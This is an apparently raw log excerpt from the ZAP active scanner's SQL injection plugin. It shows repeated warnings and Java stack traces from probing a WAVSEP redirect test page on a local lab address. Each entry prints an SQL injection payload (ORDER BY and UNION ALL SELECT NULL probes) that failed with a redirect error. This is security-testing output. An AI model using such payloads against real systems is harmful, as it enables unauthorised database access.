org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681741 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com) ORDER BY 1667-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com) ORDER BY 1667-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9681742 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com) UNION ALL SELECT NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com) UNION ALL SELECT NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681743 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) ORDER BY 1-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) ORDER BY 1-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9681744 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com) UNION ALL SELECT NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com) UNION ALL SELECT NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681745 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com) UNION ALL SELECT NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com) UNION ALL SELECT NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681745 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) ORDER BY 8635-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) ORDER BY 8635-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9681746 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com) UNION ALL SELECT NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com) UNION ALL SELECT NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681747 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681747 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681748 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681748 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681749 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681750 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at 